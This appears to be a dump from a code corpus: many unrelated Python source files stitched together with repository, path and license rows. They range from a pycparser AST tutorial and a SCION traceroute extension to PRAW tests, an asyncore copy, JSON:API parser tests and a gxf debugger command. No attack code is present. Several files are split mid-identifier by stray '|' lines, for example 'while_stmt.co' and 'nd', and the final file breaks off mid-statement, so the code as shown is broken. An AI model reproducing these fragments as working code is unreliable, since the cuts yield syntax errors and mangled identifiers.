# of nodes, each node having several children, each with a name.
# Just read the code, and let the comments guide you. The lines
# beginning with #~ can be uncommented to print out useful
# information from the AST.
# It helps to have the pycparser/_c_ast.cfg file in front of you.
#
# Copyright (C) 2008-2011, Eli Bendersky
# License: BSD
#-----------------------------------------------------------------
from __future__ import print_function
import sys
# This is not required if you've installed pycparser into
# your site-packages/ with setup.py
#
sys.path.insert(0, '..')
from pycparser import c_parser, c_ast
# This is some C source to parse. Note that pycparser must begin
# at the top level of the C file, i.e. with either declarations
# or function definitions (this is called "external declarations"
# in C grammar lingo)
#
# Also, a C parser must have all the types declared in order to
# build the correct AST. It doesn't matter what they're declared
# to, so I've inserted the dummy typedef in the code to let the
# parser know Hash and Node are types. You don't need to do it
# when parsing real, correct C code.
#
text = r"""
typedef int Node, Hash;
void HashPrint(Hash* hash, void (*PrintFunc)(char*, char*))
{
unsigned int i;
if (hash == NULL || hash->heads == NULL)
return;
for (i = 0; i < hash->table_size; ++i)
{
Node* temp = hash->heads[i];
while (temp != NULL)
{
PrintFunc(temp->entry->key, temp->entry->value);
temp = temp->next;
}
}
}
"""
# Create the parser and ask to parse the text. parse() will throw
# a ParseError if there's an error in the code
#
parser = c_parser.CParser()
ast = parser.parse(text, filename='<none>')
# Uncomment the following line to see the AST in a nice, human
# readable way. show() is the most useful tool in exploring ASTs
# created by pycparser. See the c_ast.py file for the options you
# can pass it.
#
#~ ast.show()
# OK, we've seen that the top node is FileAST. This is always the
# top node of the AST. Its children are "external declarations",
# and are stored in a list called ext[] (see _c_ast.cfg for the
# names and types of Nodes and their children).
# As you see from the printout, our AST has two Typedef children
# and one FuncDef child.
# Let's explore FuncDef more closely. As I've mentioned, the list
# ext[] holds the children of FileAST. Since the function
# definition is the third child, it's ext[2]. Uncomment the
# following line to show it:
#
#~ ast.ext[2].show()
# A FuncDef consists of a declaration, a list of parameter
# declarations (for K&R style function definitions), and a body.
# First, let's examine the declaration.
#
function_decl = ast.ext[2].decl
# function_decl, like any other declaration, is a Decl. Its type child
# is a FuncDecl, which has a return type and arguments stored in a
# ParamList node
#~ function_decl.type.show()
#~ function_decl.type.args.show()
# The following displays the name and type of each argument:
#
#~ for param_decl in function_decl.type.args.params:
#~ print('Arg name: %s' % param_decl.name)
#~ print('Type:')
#~ param_decl.type.show(offset=6)
# The body is of FuncDef is a Compound, which is a placeholder for a block
# surrounded by {} (You should be reading _c_ast.cfg parallel to this
# explanation and seeing these things by your own eyes).
#
# Let's see the block's declarations:
#
function_body = ast.ext[2].body
# The following displays the declarations and statements in the function
# body
#
#~ for decl in function_body.block_items:
#~ decl.show()
# We can see a single variable declaration, i, declared to be a simple type
# declaration of type 'unsigned int', followed by statements.
#
# block_items is a list, so the third element is the For statement:
#
for_stmt = function_body.block_items[2]
#~ for_stmt.show()
# As you can see in _c_ast.cfg, For's children are 'init, cond,
# next' for the respective parts of the 'for' loop specifier,
# and stmt, which is either a single stmt or a Compound if there's
# a block.
#
# Let's dig deeper, to the while statement inside the for loop:
#
while_stmt = for_stmt.stmt.block_items[1]
#~ while_stmt.show()
# While is simpler, it only has a condition node and a stmt node.
# The condition:
#
while_cond = while_stmt.co
|
nd
#~ while_cond.show()
# Note that it's a BinaryOp node - the basic constituent of
# expressions in our AST. BinaryOp is the expression tree, with
# left and right nodes as children. It also has the op attribute,
# which is just the string representation of the operator.
#
#~ print wh
|
ile_cond.op
#~ while_cond.left.show()
#~ while_cond.right.show()
#
# That's if for the example. I hope you now see how easy it is to
# explore the AST created by pycparser. Although on the surface it
# is quite complex and has a lot of node types, this is the
# inherent complexity of the C language every parser/compiler
# designer has to cope with.
# Using the tools provided by the c_ast package it's easy to
# explore the structure of AST nodes and write code that processes
# them.
# Specifically, see the cdecl.py example for a non-trivial
# demonstration of what you can do by recursively going through
# the AST.
#
|
FR4NK-W/osourced-scion
|
python/lib/packet/ext/traceroute.py
|
Python
|
apache-2.0
| 3,783
| 0
|
# Copyright 2015 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`traceroute` --- Traceroute extension header and its handler
=================================================================
"""
# Stdlib
import struct
# SCION
from lib.packet.ext_hdr import HopByHopExtension
from lib.packet.scion_addr import ISD_AS
from lib.util import Raw, SCIONTime
from lib.types import ExtHopByHopType
class TracerouteExt(HopByHopExtension):
"""
0b 8 16 24 32 48 64
| next hdr | hdr len | 0x00 | hops_no | (padding) |
| ISD_0 | AS_0 | IFID_0 | Timestamp_0 |
| ISD_1 | AS_1 | IFID_1 | Timestamp_1 |
...
| (padding) or HOP info |
"""
NAME = "TracerouteExt"
EXT_TYPE = ExtHopByHopType.TRACEROUTE
PADDING_LEN = 4
MIN_LEN = 1 + PADDING_LEN
HOP_LEN = HopByHopExtension.LINE_LE
|
N # Size of every hop information.
def __init__(self, raw=None): # pragma: no cover
self.hops = []
super().__init__(raw)
def _parse
|
(self, raw):
"""
Parse payload to extract hop informations.
"""
hops_no = raw[0]
data = Raw(raw, self.NAME, self.MIN_LEN + hops_no * self.HOP_LEN,
min_=True)
super()._parse(data)
# Drop hops no and padding from the first row.
data.pop(self.MIN_LEN)
for _ in range(hops_no):
isd_as = ISD_AS(data.pop(ISD_AS.LEN)) # 4 bytes
if_id, timestamp = struct.unpack(
"!HH", data.pop(self.HOP_LEN - ISD_AS.LEN))
self.append_hop(isd_as, if_id, timestamp)
@classmethod
def from_values(cls, max_hops_no): # pragma: no cover
"""
Construct extension with allocated space for `max_hops_no`.
"""
inst = TracerouteExt()
inst._init_size(max_hops_no)
return inst
def pack(self):
packed = []
packed.append(struct.pack("!B", len(self.hops)))
packed.append(bytes(self.PADDING_LEN))
for isd_as, if_id, timestamp in self.hops:
packed.append(isd_as.pack())
packed.append(struct.pack("!HH", if_id, timestamp))
# Compute and set padding for the rest of the payload.
pad_hops = self._hdr_len - len(self.hops) - 1
packed.append(bytes(pad_hops * self.HOP_LEN))
raw = b"".join(packed)
self._check_len(raw)
return raw
def append_hop(self, isd_as, if_id, timestamp=None): # pragma: no cover
"""
Append hop's information as a new field in the extension.
"""
# Check whether
assert len(self.hops) < self._hdr_len - 1
if timestamp is None:
# Truncate milliseconds to 2B
timestamp = int(SCIONTime.get_time() * 1000) % 2**16
self.hops.append((isd_as, if_id, timestamp))
def __str__(self):
tmp = ["%s(%sB):" % (self.NAME, len(self))]
tmp.append(" hops:%s" % len(self.hops))
for hop in self.hops:
tmp.append(" ISD-AS: %s IFID: %s TS: %s" % hop)
return "\n".join(tmp)
|
michael-lazar/praw3
|
tests/test_handlers.py
|
Python
|
gpl-3.0
| 1,274
| 0
|
"""Tests for UnauthenticatedReddit class."""
from __future__ import print_function, unicode_literals
from mock import patch
from praw import handlers
from random import choice
from six.moves impo
|
rt cStringIO
from .helper import PRAWTest, betamax, replace_handler
class HandlerTest(PRAWTest):
def setUp(self):
super(HandlerTest, self).setUp()
self.cache_store = cStringIO()
def _cache_hit_callback(self, key):
pass
@replace_handler(handlers.RateLimitHandler())
|
def test_ratelimit_handlers(self):
to_evict = self.r.config[choice(list(self.r.config.API_PATHS.keys()))]
self.assertIs(0, self.r.handler.evict(to_evict))
@betamax()
def test_cache_hit_callback(self):
with patch.object(HandlerTest, '_cache_hit_callback') as mock:
self.r.handler.cache_hit_callback = self._cache_hit_callback
# ensure there won't be a difference in the cache key
self.r.login(self.un, self.un_pswd, disable_warning=True)
before_cache = list(self.r.get_new(limit=5))
after_cache = list(self.r.get_new(limit=5))
self.assertTrue(mock.called)
self.assertEqual(before_cache, after_cache)
self.r.handler.cache_hit_callback = None
|
skyostil/tracy
|
src/common/Log.py
|
Python
|
mit
| 1,941
| 0.009789
|
# Copyright (c) 2011 Nokia
#
# Permission is hereby granted, free of charg
|
e, to any person obtaining a copy
# of this software and associated documentation files (the "So
|
ftware"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import os
import Console
quiet = False
#logFile = open("tracy.log", "w")
logFile = None
labels = {
"warn": ((0xff, 0xff, 0x00), "(W)"),
"debug": ((0x00, 0x00, 0xff), "(D)"),
"notice": ((0x00, 0xff, 0x00), "(N)"),
"error": ((0xff, 0x00, 0x00), "(E)"),
}
def _log(label, msg, file = sys.stdout):
color, ident = labels[label]
if not quiet:
if file.isatty():
# Clear the current line
file.write("\r" + " " * 79 + "\r")
Console.colorizer.setColor(*color)
file.write(ident)
if file.isatty():
Console.colorizer.resetColor()
file.write(" " + str(msg) + "\n")
if logFile:
print >>logFile, labels["warn"] + " " + str(msg)
warn = lambda msg: _log("warn", msg)
debug = lambda msg: _log("debug", msg)
notice = lambda msg: _log("notice", msg)
error = lambda msg: _log("error", msg)
|
Gzsiceberg/kaggle-avito
|
ins2/gen_data.py
|
Python
|
mit
| 19,154
| 0.005325
|
from csv import DictReader
from datetime import datetime, timedelta
from collections import defaultdict
import cPickle as pickle
from math import exp, log, sqrt
import random, gc
from util import read_dump, write_dump, cache, read_tsv, convert_ts, data, next_row, get_category
import argparse, ast, re, json
def filter_row(row, data_type, sr):
object_type = int(row["ObjectType"])
if object_type != 3:
return False
y = int(row.get("IsClick", 0))
if data_type == 0 and y == 0 and random.random() > sr:
return False
return True
def calc_ctr(x, y):
avg_ctr = 0.0060281
return int(round((x + avg_ctr * 10) * 100.0 / (y + 10)))
def log_trans(x):
return int(round(log(x + 1)))
def get_user_info():
user_info_map = {}
for t, row in read_tsv("data/UserInfo.tsv"):
for k in row:
row[k] = int(row[k])
uid = row["UserID"]
del row["UserID"]
user_info_map[uid] = row
return user_info_map
def trans_ad_info(ad_info):
if int(ad_info["IsContext"]) == 0:
return None
trans_keys = [
"CategoryID",
"Price",
"Params",
"Title",
]
del_keys = ["AdID", "IsContext", "_id", "LocationID",]
for k in del_keys:
if k in ad_info:
del ad_info[k]
for key in trans_keys:
val = ad_info[key]
if key == "Price":
if val == "":
pass
else:
ad_info[key] = float(ad_info[key])
elif key == "Params":
params = ad_info[key]
params = ast.literal_eval(params) if params else {}
for par_key in params:
params[par_key] = unicode(params[par_key], "utf-8")
val = tuple([hash_val(0, (k, v)) for k, v in params.items()])
if len(val) == 0:
val = (-1,)
ad_info[key] = val
elif key == "Title":
if not isinstance(ad_info[key], unicode):
ad_info[key] = unicode(ad_info[key], "utf-8")
else:
if val == "":
val = -1
ad_info[key] = int(val)
return ad_info
ad_info_list = []
ad_info_iter = read_tsv("data/AdsInfo.tsv")
def get_ad_info(aid):
while aid - 1 >= len(ad_info_list):
t, row = next(ad_info_iter, (None, None))
if row is None:
break
ad_info_list.append(trans_ad_info(row))
return ad_info_list[aid - 1]
se_params_iter = read_tsv("data/search_params.csv", delimiter=",")
se_param_list = [None]
def get_se_param(sid):
while se_param_list[0] is None or se_param_list[0]["SearchID"] < sid:
t, se_param = next(se_params_iter, (None, None))
se_param["SearchID"] = int(se_param["SearchID"])
params = json.loads(se_param["SearchParams"])
se_param["SearchParams"] = [hash_val(0, (int(k), v)) for (k, v) in params.items()]
se_param_list[0] = se_param
params = [-1,] if se_param_list[0]["SearchID"] != sid else se_param_list[0]["SearchParams"]
return params
ad_price_list = []
ad_price_iter = read_tsv("data/ad_price.tsv", delimiter=" ")
def get_ad_price(aid):
while aid - 1 >= len(ad_price_list):
t, row = next(ad_price_iter, (None, None))
if row is None:
break
price = row["Price"]
price = float(price) if price else ""
ad_price_list.append(price)
return ad_price_list[aid - 1]
def get_features(sinfo, rows, test=False):
feature_map = defaultdict(list)
sid = sinfo["SearchID"]
sinfo["SearchParams"] = get_se_param(sid)
user_cnt_row = next(user_cnt_iter, (None, None))[1]
while int(user_cnt_row["SearchID"]) != sid:
user_cnt_row = next(user_cnt_iter, (None, None))[1]
user_aid_cnt_rows = next(user_aid_cnt_iter, (None, None))[1]
while int(user_aid_cnt_rows[0]["SearchID"]) != sid:
user_aid_cnt_rows = next(user_aid_cnt_iter, (None, None))[1]
user_aid_cnt_dict = {}
for row in user_aid_cnt_rows:
aid = int(row["AdID"])
user_aid_cnt_dict[aid] = row
ad_infos = []
for row in rows:
aid = int(row["AdID"])
row.update(user_aid_cnt_dict[aid])
ad_infos.append(get_ad_info(aid))
uid = int(sinfo["UserID"])
user_info = user_info_map.get(uid, {"UserAgentID": "",
|
"UserAgentOSID": "",
"UserDeviceID": "",
"UserAgentFamilyID": ""})
feature_map["user_cnt"] = [user_cnt_row]
feature_map["user_info"] = [user_info]
feature_map["ad_info"] = ad_infos
feature_map["stream_info"] = rows
feature_map["sinfo"] = [sinfo]
return feature_map
def extract_slot_feas(rows, sinfo):
da
|
ta = map(lambda x: (int(x["Position"]), int(x["ObjectType"]), x), rows)
data.sort()
price_data = []
ot_cnt = defaultdict(int)
all_pos = []
all_ot = []
for i in range(len(data)):
all_pos.append(data[i][0])
all_ot.append(data[i][1])
aid = int(data[i][2]["AdID"])
price_data.append((get_ad_price(aid), i))
i_obt = data[i][1]
ot_cnt[i_obt] += 1
ucnt, lcnt = 0, 0
for j in range(len(data)):
if i == j:
continue
j_obt = data[j][1]
if j_obt == 2:
if i < j:
lcnt += 1
else:
ucnt += 1
data[i][2]["hl_lcnt"] = lcnt
data[i][2]["hl_ucnt"] = ucnt
for k in range(1, 4):
v = ot_cnt[k]
sinfo["ot%s_cnt"%k] = v
sinfo["record_cnt"] = len(rows)
sinfo["pos_type"] = hash_val(0, tuple(all_pos))
sinfo["pos_ot_type"] = hash_val(0, tuple(all_ot))
price_data.sort()
avg_price, avg_cnt = 0, 0
for p, i in price_data:
if p != "":
avg_price += p
avg_cnt += 1
data[i][2]["price_pos"] = i
else:
data[i][2]["price_pos"] = -1
if avg_cnt == 0 or avg_price <= 0:
pass
else:
avg_price /= avg_cnt
for p, i in price_data:
if not p:
ratio = -1
elif avg_price <= 0:
ratio = -2
else:
ratio = int(round((p / avg_price) * 100))
data[i][2]["price_ratio"] = ratio
def stream_info_func(vs, name=False):
keys = ["AdID",
"Position",
"HistCTR",
"hl_lcnt",
"hl_ucnt",
"clk_cnt",
"show_cnt",
"t_show_cnt",
"price_pos",
"price_ratio",
]
for v in vs[0]:
if name:
yield keys
else:
x = {}
for k in keys:
if k == "HistCTR":
val = v[k]
if val != "":
val = int(round(float(val) * 1000))
elif k in ("pos_show_cnt",):
val = log_trans(int(v[k]))
else:
val = v[k]
x[k] = val
x["u_aid_ctr"] = calc_ctr(int(x["clk_cnt"]), int(x["show_cnt"]))
# x["u_pos_ctr"] = calc_ctr(int(x["pos_clk_cnt"]), int(x["pos_show_cnt"]))
yield x
def sinfo_func(vs, name=False):
keys = [
"IPID",
"UserID",
"IsUserLoggedOn",
"SearchQuery",
"SearchParams",
"ot1_cnt",
"ot2_cnt",
"ot3_cnt",
"record_cnt",
"pos_type",
"pos_ot_type",
"s_LocationID",
"s_CategoryID",
]
for v in vs[0]:
if name:
yield keys
else:
x = {}
for k in keys:
if k == "SearchQuery":
query = unicode(v["SearchQuery"], "utf-8")
val = map(lambda x : hash_val(0, x), query.split())
if len(val) == 0:
val = [-1,]
else:
val = v[k]
x[k] = val
#
|
natano/tiget
|
tiget/git.py
|
Python
|
isc
| 872
| 0.001147
|
import pkg_resources
from tiget.conf import settings
class GitError(Exception): pass
def get_config(name):
repo = settings.core.repository
if repo is
|
None:
raise GitError('no repository found')
return repo.config[name]
def is_repo_initialized():
repo = settings.core.repository
if repo is None:
return False
ref = 'refs/heads/{}'.format(settings.core.branch)
try:
repo.lookup_reference(ref)
except KeyError:
return False
return True
def init_repo():
from git_orm import transaction
if is_repo_initialized():
raise GitError('repository is already initialized')
with transa
|
ction.wrap() as trans:
tigetrc = pkg_resources.resource_string('tiget', 'data/tigetrc')
trans.set_blob(['config', 'tigetrc'], tigetrc)
trans.add_message('Initialize Repository')
|
mkrcah/propsort
|
propsort/__init__.py
|
Python
|
mit
| 22
| 0
|
__author__ =
|
'mkrcah
|
'
|
kenshinx/rps
|
script/proxycheck/asyncore.py
|
Python
|
mit
| 20,290
| 0.001774
|
# -*- Mode: Python -*-
# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provide
|
d that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be u
|
sed in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
"""Basic infrastructure for asynchronous socket service clients and servers.
There are only two ways to have a program on a single processor do "more
than one thing at a time". Multi-threaded programming is the simplest and
most popular way to do it, but there is another very different technique,
that lets you have nearly all the advantages of multi-threading, without
actually using multiple threads. it's really only practical if your program
is largely I/O bound. If your program is CPU bound, then pre-emptive
scheduled threads are probably what you really need. Network servers are
rarely CPU-bound, however.
If your operating system supports the select() system call in its I/O
library (and nearly all do), then you can use it to juggle multiple
communication channels at once; doing other work while your I/O is taking
place in the "background." Although this strategy can seem strange and
complex, especially at first, it is in many ways easier to understand and
control than multi-threaded programming. The module documented here solves
many of the difficult problems for you, making the task of building
sophisticated high-performance network servers and clients a snap.
"""
import select
import socket
import sys
import time
import os
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, ECONNRESET, \
ENOTCONN, ESHUTDOWN, EINTR, EISCONN, EBADF, ECONNABORTED, errorcode
try:
socket_map
except NameError:
socket_map = {}
def _strerror(err):
try:
return os.strerror(err)
except (ValueError, OverflowError, NameError):
if err in errorcode:
return errorcode[err]
return "Unknown error %s" %err
class ExitNow(Exception):
pass
_reraised_exceptions = (ExitNow, KeyboardInterrupt, SystemExit)
def read(obj):
try:
obj.handle_read_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def write(obj):
try:
obj.handle_write_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def _exception(obj):
try:
obj.handle_expt_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def readwrite(obj, flags):
try:
if flags & select.POLLIN:
obj.handle_read_event()
if flags & select.POLLOUT:
obj.handle_write_event()
if flags & select.POLLPRI:
obj.handle_expt_event()
if flags & (select.POLLHUP | select.POLLERR | select.POLLNVAL):
obj.handle_close()
except socket.error, e:
if e.args[0] not in (EBADF, ECONNRESET, ENOTCONN, ESHUTDOWN,
ECONNABORTED):
obj.handle_error()
else:
obj.handle_close()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def poll(timeout=0.0, map=None):
if map is None:
map = socket_map
if map:
r = []; w = []; e = []; t = []
for fd, obj in map.items():
is_r = obj.readable()
is_w = obj.writable()
is_t = obj.timeout()
if is_r:
r.append(fd)
if is_w:
w.append(fd)
if is_r or is_w:
e.append(fd)
if is_t:
t.append(fd)
if [] == r == w == e:
time.sleep(timeout)
return
try:
r, w, e = select.select(r, w, e, timeout)
except select.error, err:
if err.args[0] != EINTR:
raise
else:
return
for fd in r:
obj = map.get(fd)
if obj is None:
continue
read(obj)
for fd in w:
obj = map.get(fd)
if obj is None:
continue
write(obj)
for fd in e:
obj = map.get(fd)
if obj is None:
continue
_exception(obj)
for fd in t:
obj = map.get(fd)
if obj is None:
continue
obj.handle_timeout()
def poll2(timeout=0.0, map=None):
# Use the poll() support added to the select module in Python 2.0
if map is None:
map = socket_map
if timeout is not None:
# timeout is in milliseconds
timeout = int(timeout*1000)
pollster = select.poll()
if map:
for fd, obj in map.items():
flags = 0
if obj.readable():
flags |= select.POLLIN | select.POLLPRI
if obj.writable():
flags |= select.POLLOUT
if flags:
# Only check for exceptions if object was either readable
# or writable.
flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
pollster.register(fd, flags)
try:
r = pollster.poll(timeout)
except select.error, err:
if err.args[0] != EINTR:
raise
r = []
for fd, flags in r:
obj = map.get(fd)
if obj is None:
continue
readwrite(obj, flags)
poll3 = poll2 # Alias for backward compatibility
def loop(timeout=30.0, use_poll=False, map=None, count=None):
if map is None:
map = socket_map
if use_poll and hasattr(select, 'poll'):
poll_fun = poll
else:
poll_fun = poll
if count is None:
while map:
poll_fun(timeout, map)
else:
while map and count > 0:
poll_fun(timeout, map)
count = count - 1
class dispatcher:
debug = False
connected = False
accepting = False
closing = False
addr = None
ignore_log_types = frozenset(['warning'])
def __init__(self, sock=None, map=None):
if map is None:
self._map = socket_map
else:
self._map = map
self._fileno = None
if sock:
# Set to nonblocking just to make sure for cases where we
# get a socket from a blocking source.
sock.setblocking(0)
self.set_socket(sock, map)
self.connected = True
# The constructor no longer requires that the socket
# passed be connected.
try:
self.addr = sock.getpeername()
except socket.error, err:
if err.args[0] == ENOTCONN:
# To handle the case where we got an unconnected
# socket.
self.connected = False
else:
# The socket is broken in some unknown way, alert
# the user and remove it from the map (to prevent
# polling of broken sockets).
self.del_channel(map)
|
django-json-api/rest_framework_ember
|
tests/test_parsers.py
|
Python
|
bsd-2-clause
| 4,172
| 0.001198
|
import json
from io import BytesIO
import pytest
from rest_framework.exceptions import ParseError
from rest_framework_json_api.parsers import JSONParser
from rest_framework_json_api.utils import format_value
from tests.views import BasicModelViewSet
class TestJSONParser:
@pytest.fixture
def parser(self):
return JSONParser()
@pytest.fixture
def parse(self, parser):
def parse_wrapper(data, parser_context):
stream = BytesIO(json.dumps(data).encode("utf-8"))
return parser.parse(stream, None, parser_context)
return parse_wrapper
@pytest.fixture
def parser_context(self, rf):
return {"request": rf.post("/"), "kwargs": {}, "view": BasicModelViewSet()}
@pytest.mark.parametrize(
"format_field_names",
[
False,
"dasherize",
"camelize",
"capitalize",
"underscore",
],
)
def test_parse_formats_field_names(
self,
settings,
format_field_names,
parse,
parser_context,
):
settings.JSON_API_FORMAT_FIELD_NAMES = format_field_names
data = {
"data": {
"id": "123",
"type": "BasicModel",
"attributes": {
format_value("test_attribute", format_field_names): "test-value"
},
"relationships": {
format_value("test_relationship", format_field_names): {
"data": {"type": "TestRelationship", "id": "123"}
}
},
}
}
result = parse(data, parser_context)
assert result == {
"id": "123",
"type": "BasicModel",
"test_attribute": "test-value",
"test_relationship": {"id": "123", "type": "TestRelationship"},
}
def test_parse_extracts_meta(self, parse, parser_context):
data = {
"data": {
"type": "BasicModel",
},
"meta": {"random_key": "random_value"},
}
result = parse(data, parser_context)
assert result["_meta"] == data["meta"]
def test_parse_with_default_arguments(self, parse):
data = {
"data": {
"type": "BasicModel",
},
}
result = parse(data, None)
assert result == {"type": "BasicModel"}
def test_parse_preserves_json_value_field_names(
self, settings, parse, parser_context
):
settings.JSON_API_FORMAT_FIELD_NAMES = "dasherize"
data = {
"data": {
"type": "BasicModel",
"attributes": {"json-value": {"JsonKey": "JsonValue"}},
},
}
result = parse(data, parser_context)
assert result["json_value"] == {"JsonKey": "JsonValue"}
def test_parse_raises_error_on_empty_data(self, parse, parser_context):
data = []
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert "Received document does not contain primary data" == str(excinfo.value)
def test_parse_fails_on_list_of_objects(self, parse, parser_context):
data = {
"data": [
{
"type": "BasicModel",
"attributes": {"json-value": {"JsonKey": "JsonValue"}},
}
],
}
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert (
"Received data is not a valid JSON:API Resource Identifier Object"
== str(excinfo.value)
)
def test_parse_fails_when_id_is_missing_on_patch(self, rf, parse, parser_
|
context):
parser_context["request"] = rf.patch("/
|
")
data = {
"data": {
"type": "BasicModel",
},
}
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert "The resource identifier object must contain an 'id' member" == str(
excinfo.value
)
|
Kingside/six-four
|
setup.py
|
Python
|
mit
| 2,189
| 0.01736
|
#!/usr/bin/env python
from setuptools import setup
setup(name='sixfour',
version='1.3.3',
description='base64 Image Encoder and Embedder',
author='Christopher Simpkins',
author_email='chris@zerolabs.net',
maintainer='Christopher Simpkins',
maintainer_email='chris@zerolabs.net',
url='https://github.com/chrissimpkins/six-four',
platforms=['any'],
py_modules=['sixfour'],
scripts=['sixfour'],
license='MIT License',
keywords='image,base64,web,internet,CSS,HTML,Markdown,sass,scss,less,embed,tag,64',
long_description="""Six-Four is a base64 encoder fo
|
r images that embeds an appropriately formatted, encoded image in HTML, Markdown, CSS, LESS, or SASS files, or streams the raw image data through the standard output stream.
`Six-Four Documentation <http://chrissimpkins.github.io/six-four/>`_
Tested in Python v2.7.6 & v3.3.2""",
classifiers= [
'Development Status :: 5 - Production/Stable',
'Environment :: MacOS X',
'Environment :: Other Environment',
'Environment :: Web Environment',
'Inten
|
ded Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS',
'Operating System :: Microsoft',
'Operating System :: Microsoft :: MS-DOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: Other OS',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: BSD :: BSD/OS',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Operating System :: POSIX :: Other',
'Operating System :: Unix',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Unix Shell',
'Topic :: Internet',
'Topic :: Multimedia',
'Topic :: Multimedia :: Graphics',
'Topic :: Multimedia :: Graphics :: Editors',
'Topic :: Multimedia :: Graphics :: Graphics Conversion'
],
)
|
chipx86/reviewboard
|
reviewboard/hostingsvcs/evolutions/account_hosting_url.py
|
Python
|
mit
| 247
| 0
|
from __future__ import unicode_literals
from django_evolution.mutations import AddField
from django.db import models
MUTATIONS = [
|
AddField('HostingServiceAccount', 'hosting_url', models.CharField,
|
max_length=256, null=True)
]
|
arrow-/pitstops
|
commit.py
|
Python
|
unlicense
| 862
| 0.00232
|
import os
# This function only READS the Commit info.
# There is no point in loading any commit in memory.
# What purpose can that serve? Nothing. (Prove this)
def load(cls, name, path):
try:
with open(path, 'rb') as commit_info_file:
commit_info_dict = pickle.load(commit_info_file.read())
return commit_info_dict
except FileNotFoundError:
print("Could not find commit-info here
|
:\n`%s`" % path)
sys.exit(1)
# This object hold only some info about a SINGLE Commit
class Commit:
def __init__(self, parent, branch, message, repo):
self.message = message
self.hash = self.make_hash(
|
)
# self.repo.dstore.get_commits_by_branch(branch)
# make changes to tree
# save
# make chages to main tree?
# exit
def make_hash(self):
return "yash uuid"
|
xulesc/algos
|
psc/test_usm_bp.py
|
Python
|
gpl-3.0
| 1,016
| 0.030512
|
#!/usr/bin/python
import Bio.PDB.PDBParser
from Bio.PDB.PSC.usm import USM
import os
import numpy as np
def get_ca_atom_list(model):
atoms = []
for chain in model:
for res in chain:
try:
atoms.append(res['CA'])
except:
pass
return atoms
def get_contact_map_complexities(in_dir):
usm = USM()
pdb_parser = Bio.PDB.PDBParser(QUIET = True)
structure_cm_string = {};
for filename in os.listdir(in_dir):
structure = pdb_parser.get_structure("reference", "%s/%s" %(in_dir, filename))
coords = np.array(m
|
ap(lambda x : x.coord, get_ca_atom_list(structure[0])))
structure_cm_string[filename] = usm.get_contact_map(coords)[1]
for k1, v1 in structure_cm_string.iteritems():
for k2, v2 in structure_cm_string.iteritems():
dist = usm.dist(structure_cm_string[k1], structure_cm_string[k2])
print '%s - %s : %f' %(
|
k1, k2, dist)
if __name__ == '__main__':
np.set_printoptions(threshold='nan')
get_contact_map_complexities('pdb_data')
|
wapiflapi/gxf
|
gxf/extensions/registers.py
|
Python
|
mit
| 1,628
| 0
|
# -*- coding: utf-8 -*-
import gxf
from gxf.format
|
ting import Token, Formattable
@gxf.register()
class Registers(gxf.DataCommand):
'''
|
Shows registers.
'''
def setup(self, parser):
parser.add_argument("-m", "--mark", action='append', default=[],
help="Highlight some registers.")
parser.add_argument("-M", "--mark-used", action='store_true',
help="Highlight currently used registers.")
def run(self, args):
regs = gxf.Registers()
memory = gxf.Memory()
tomark = args.mark[:]
if args.mark_used:
try:
